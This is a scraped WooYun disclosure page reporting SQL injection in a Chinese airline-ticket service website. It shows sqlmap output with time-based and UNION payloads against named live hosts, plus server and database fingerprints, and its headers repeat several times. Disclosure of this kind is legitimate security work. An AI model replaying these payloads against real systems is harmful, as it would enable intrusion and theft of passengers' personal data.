C9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPuiuouWNleafpeivojwvYT48aSBjbGFzcz0iaWNvMDQiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvT3JkZXIvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvaG90ZWwuYXNweCI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci90cmFpbi5hc3B4Ij7CtyDngavovabnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL1JldHVybi5hc3B4Ij7CtyDpgIDnpajorrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL3NjZ3FfbGlzdC5hc3B4Ij7CtyDljYfoiLHmlLnmnJ/orrDlvZU8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPuiuouWNleWuoeaguDwvYT48aSBjbGFzcz0iaWNvMDUiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvQ2hlY2svZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvQ2hlY2svaG90ZWwuYXNweCI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9DaGVjay90cmFpbi5hc3B4Ij7CtyDngavovabnpag8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPuW3ruaXheaKpeihqDwvYT48aSBjbGFzcz0iaWNvMDYiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvUmVwb3J0L2ZsaWdodC5hc3B4Ij7CtyDpo57mnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL1JlcG9ydC90cmFpbi5hc3B4Ij7CtyDngavovabnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL1JlcG9ydC9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL1JlcG9ydC92aXNhLmFzcHgiPsK3IOetvuivgTwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2J4LmFzcHgiPsK3IOS/nemZqTwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L290aGVyLmFzcHgiPsK3IOWFtuWugzwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6LSi5Yqh566h55CGPC9hPjxpIGNsYXNzPSJpY28wNyI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwvZmtzcV9tZWIuYXNweCI+wrcg5LuY5qy+55Sz6K+36K6w5b2VPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwvcGF5X2hpc3RvcnkuYXNweCI+wrcg5bey5LuY5qy+6K6w5b2VPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwvb3JkZXJzX2FsbC5hc3B4Ij7CtyDnu7zlkIjnu5/orqE8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC94Y2Rfb3JkZXJzLmFzcHgiPsK3IOihjOeoi+WNleS6pOaOpTwvYT48L2xpPjwvdWw+PC9saT5kAgsPFgIeC18hSXRlbUNvdW50ZmQCDQ9kFggCAQ8PFgIfAAVI5LiK5rW35pel5pyI6KGM6Iiq56m656Wo5Yqh5pyN5Yqh5pyJ6ZmQ5YWs5Y+4ICAgICDmsqpJQ1DlpIcxMTA0Mjc2NOWPty0xZGQCAw8PFgIfAAUw5Zyw5Z2A77ya5LiK5rW35biC5aSn5rih5rKz6LevMTcxOOWPt0LluqdCNzA35a6kZGQCBQ8PFgIfAAU655S16K+d77yaMDIxLTUxMDk2OTU5IDAyMS01MTA5NjEwMCAgIOS8oOecn++8mjAyMS01MTA2MjA5MGRkAgcPFgIfAAVLPHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnPnNldEludGVydmFsKCdtZXNzYWdlX3R4KCknLCAzMDAwMCk7PC9zY3JpcHQ+ZGQLlUfXjIPcz7cRnJLQ7WiqVS6Qk58FN7zSQNz+3gjT+w==&__EVENTVALIDATION=/wEWCgKI3oXRCgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCb8RnfQLgjfBlqC5ElREBfhxqKy8PXOzPeQwVu/7scte&sdate=2015/6/15');WAITFOR DELAY '0:0:10'--&edate=2015/6/15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=7
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: __VIEWSTATE=/wEPDwUKMTE2MDQ5NzAwMQ9kFgICAw9kFgYCAQ9kFgwCAw8PFgIeBFRleHQFCGRrYWpzZGtqZGQCBQ8PFgIfAAUMMDIxLTUxMDk2OTU5ZGQCBw8WAh4HVmlzaWJsZWcWAgIBDw8WAh8ABQ1BZG1pbmlzdHJhdG9yZGQCCQ8PFgQeC05hdmlnYXRlVXJsBRR+L1N5c3RlbS9teWluZm8uYXNweB8ABQzmiJHnmoTkv6Hmga9kZAILDw8WBB8CBRJ+L21lbWJlci9leGl0LmFzcHgfAAUM5a6J5YWo6YCA5Ye6ZGQCDQ8WAh8ABaAPPGxpPjxhIGhyZWY9IiMiPuezu+e7n+euoeeQhjwvYT48aSBjbGFzcz0iaWNvMDMiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvU3lzdGVtL215aW5mby5hc3B4Ij7CtyDkvIHkuJrkv6Hmga88L2E+PC9saT48bGk+PGEgaHJlZj0iL21lbWJlci9Hcm91cC5hc3B4Ij7CtyDpg6jpl6jliIbnu4Q8L2E+PC9saT48bGk+PGEgaHJlZj0iL21lbWJlci9GbGFnLmFzcHgiPsK3IOinkuiJsuadg+mZkDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL1BlcnNvbm5lbC5hc3B4Ij7CtyDlkZjlt6XnrqHnkIY8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPuW3ruaXhemihOWumjwvYT48aSBjbGFzcz0iaWNvMDIiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvRmxpZ2h0LyI+wrcg5Zu95YaF5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9GbGlnaHRfaW50LyI+wrcg5Zu96ZmF5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9Ib3RlbC8iPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvVHJhaW4vIj7CtyDngavovabnpag8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPuiuouWNleafpeivojwvYT48aSBjbGFzcz0iaWNvMDQiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvT3JkZXIvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvaG90ZWwuYXNweCI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci90cmFpbi5hc3B4Ij7CtyDngavovabnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL1JldHVybi5hc3B4Ij7CtyDpgIDnpajorrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL3NjZ3FfbGlzdC5hc3B4Ij7CtyDljYfoiLHmlLnmnJ/orrDlvZU8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPuiuouWNleWuoeaguDwvYT48aSBjbGFzcz0iaWNvMDUiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvQ2hlY2svZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvQ2hlY2svaG90ZWwuYXNweCI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9DaGVjay90cmFpbi5hc3B4Ij7CtyDngavovabnpag8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPuW3ruaXheaKpeihqDwvYT48aSBjbGFzcz0iaWNvMDYiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvUmVwb3J0L2ZsaWdodC5hc3B4Ij7CtyDpo57mnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL1JlcG9ydC90cmFpbi5hc3B4Ij7CtyDngavovabnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL1JlcG9ydC9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL1JlcG9ydC92aXNhLmFzcHgiPsK3IOetvuivgTwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2J4LmFzcHgiPsK3IOS/nemZqTwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L290aGVyLmFzcHgiPsK3IOWFtuWugzwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6LSi5Yqh566h55CGPC9hPjxpIGNsYXNzPSJpY28wNyI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwvZmtzcV9tZWIuYXNweCI+wrcg5LuY5qy+55Sz6K+36K6w5b2VPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwvcGF5X2hpc3RvcnkuYXNweCI+wrcg5bey5LuY5qy+6K6w5b2VPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwvb3JkZXJzX2FsbC5hc3B4Ij7CtyDnu7zlkIjnu5/orqE8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC94Y2Rfb3JkZXJzLmFzcHgiPsK3IOihjOeoi+WNleS6pOaOpTwvYT48L2xpPjwvdWw+PC9saT5kAgsPFgIeC18hSXRlbUNvdW50ZmQCDQ9kFggCAQ8PFgIfAAVI5LiK5rW35pel5pyI6KGM6Iiq56m656Wo5Yqh5pyN5Yqh5pyJ6ZmQ5YWs5Y+4ICAgICDmsqpJQ1DlpIcxMTA0Mjc2NOWPty0xZGQCAw8PFgIfAAUw5Zyw5Z2A77ya5LiK5rW35biC5aSn5rih5rKz6LevMTcxOOWPt0LluqdCNzA35a6kZGQCBQ8PFgIfAAU655S16K+d77yaMDIxLTUxMDk2OTU5IDAyMS01MTA5NjEwMCAgIOS8oOecn++8mjAyMS01MTA2MjA5MGRkAgcPFgIfAAVLPHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnPnNldEludGVydmFsKCdtZXNzYWdlX3R4KCknLCAzMDAwMCk7PC9zY3JpcHQ+ZGQLlUfXjIPcz7cRnJLQ7WiqVS6Qk58FN7zSQNz+3gjT+w==&__EVENTVALIDATION=/wEWCgKI3oXRCgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCb8RnfQLgjfBlqC5ElREBfhxqKy8PXOzPeQwVu/7scte&sdate=2015/6/15') UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(70)+CHAR(68)+CHAR(78)+CHAR(110)+CHAR(77)+CHAR(115)+CHAR(112)+CHAR(90)+CHAR(104)+CHAR(75)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &edate=2015/6/15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=7
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
current database:    'ryx_sha'

案例五：http://hhcl.h-h.com.cn/

<code>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sdate (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=/wEPDwUJODA2NDEzMjQ3D2QWAgIDD2QWBgIBD2QWDAIDDw8WAh4EVGV4dAUFZGthZGpkZAIFDw8WAh8ABQwwMTAtNTE2NjIzNTVkZAIHDxYCHgdWaXNpYmxlZxYCAgEPDxYCHwAFDUFkbWluaXN0cmF0b3JkZAIJDw8WBB4LTmF2aWdhdGVVcmwFFH4vU3lzdGVtL215aW5mby5hc3B4HwAFDOaIkeeahOS/oeaBr2RkAgsPDxYEHwIFEn4vbWVtYmVyL2V4aXQuYXNweB8ABQzlronlhajpgIDlh7pkZAINDxYCHwAFrg88bGk+PGEgaHJlZj0iIyI+57O757uf566h55CGPC9hPjxpIGNsYXNzPSJpY28wMiI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9TeXN0ZW0vbXlpbmZvLmFzcHgiPsK3IOS8geS4muS/oeaBrzwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0dyb3VwLmFzcHgiPsK3IOmDqOmXqOWIhue7hDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0ZsYWcuYXNweCI+wrcg6KeS6Imy5p2D6ZmQPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9tZW1iZXIvUGVyc29ubmVsLmFzcHgiPsK3IOWRmOW3peeuoeeQhjwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+5beu5peF6aKE5a6aPC9hPjxpIGNsYXNzPSJpY28wMyI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9GbGlnaHQvIj7CtyDlm73lhoXmnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZsaWdodF9pbnQvZ2p0aWNrZXRzLmFzcHgiPsK3IOWbvemZheacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvSG90ZWwvIj7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL1RyYWluLyI+wrcg54Gr6L2m56WoPC9hPjwvbGk+PC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7orqLljZXmn6Xor6I8L2E+PGkgY2xhc3M9ImljbzA0Ij48L2k+PHVsIGNsYXNzPSJzdWItbmF2Ij48bGk+PGEgaHJlZj0iL09yZGVyL2ZsaWdodC5hc3B4Ij7CtyDpo57mnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvdHJhaW4uYXNweCI+wrcg54Gr6L2m56WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci9SZXR1cm4uYXNweCI+wrcg6YCA56Wo6K6w5b2VPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci9zY2dxX2xpc3QuYXNweCI+wrcg5Y2H6Iix5pS55pyf6K6w5b2VPC9hPjwvbGk+PC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7orqLljZXlrqHmoLg8L2E+PGkgY2xhc3M9ImljbzA1Ij48L2k+PHVsIGNsYXNzPSJzdWItbmF2Ij48bGk+PGEgaHJlZj0iL0NoZWNrL2ZsaWdodC5hc3B4Ij7CtyDpo57mnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0NoZWNrL2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvQ2hlY2svdHJhaW4uYXNweCI+wrcg54Gr6L2m56WoPC9hPjwvbGk+PC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7lt67ml4XmiqXooag8L2E+PGkgY2xhc3M9ImljbzA2Ij48L2k+PHVsIGNsYXNzPSJzdWItbmF2Ij48bGk+PGEgaHJlZj0iL1JlcG9ydC9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvdHJhaW4uYXNweCI+wrcg54Gr6L2m56WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvaG90ZWwuYXNweCI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvdmlzYS5hc3B4Ij7CtyDnrb7or4E8L2E+PC9saT48bGk+PGEgaHJlZj0iL1JlcG9ydC9ieC5hc3B4Ij7CtyDkv53pmak8L2E+PC9saT48bGk+PGEgaHJlZj0iL1JlcG9ydC9vdGhlci5hc3B4Ij7CtyDlhbblroM8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPui0ouWKoeeuoeeQhjwvYT48aSBjbGFzcz0iaWNvMDciPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL2Zrc3FfbWViLmFzcHgiPsK3IOS7mOasvueUs+ivt+iusOW9lTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL3BheV9oaXN0b3J5LmFzcHgiPsK3IOW3suS7mOasvuiusOW9lTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL29yZGVyc19hbGwuYXNweCI+wrcg57u85ZCI57uf6K6hPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwveGNkX29yZGVycy5hc3B4Ij7CtyDooYznqIvljZXkuqTmjqU8L2E+PC9saT48L3VsPjwvbGk+ZAILDxYCHgtfIUl0ZW1Db3VudGZkAg0PZBYGAgEPDxYCHwAFX0NvcHlyaWdodCAmY29weTsgMjAxNCBoaGNsLmgtaC5jb20uY24gYWxsIHJpZ2h0cyByZXNlcnZlZC4g5YyX5Lqs5rW35Y2O6Iiq56m65pyN5Yqh5pyJ6ZmQ5YWs5Y+4ZGQCAw8PFgIfAAUx5Zyw5Z2A77ya5YyX5Lqs5biC5Lic5Z+O5Yy65a6J5b636Lev55SyMTDlj7c1LTEwNWRkAgUPDxYCHwAFK+eUteivne+8mjAxMC01MTY2MjM1NSDkvKDnnJ/vvJowMTAtNTE2Njg0NTBkZGQ4DgfmxxdQd1D4B9sSChUIuH8jnZxCNN1XTiLowCZMtA==&__EVENTVALIDATION=/wEWCgL176S6AgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7A

漏洞证明：

修复方案：

过滤

版权声明：转载请注明来源 missy@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-06-19 17:19

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT向民航行业测评中心通报,由其后续协调网站管理单位处置.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0120629

漏洞标题：海华航空存在两处SQL注入泄露大量订单信息（姓名、手机、证件号、航班号和起飞时间等）

相关厂商：北京海华航空服务有限公司

漏洞作者： missy

提交时间：2015-06-15 15:25

修复时间：2015-09-17 17:20

公开时间：2015-09-17 17:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 missy@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0120629

漏洞标题：海华航空存在两处SQL注入泄露大量订单信息（姓名、手机、证件号、航班号和起飞时间等）

相关厂商：北京海华航空服务有限公司

漏洞作者： missy

提交时间：2015-06-15 15:25

修复时间：2015-09-17 17:20

公开时间：2015-09-17 17:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0120629"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 missy@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：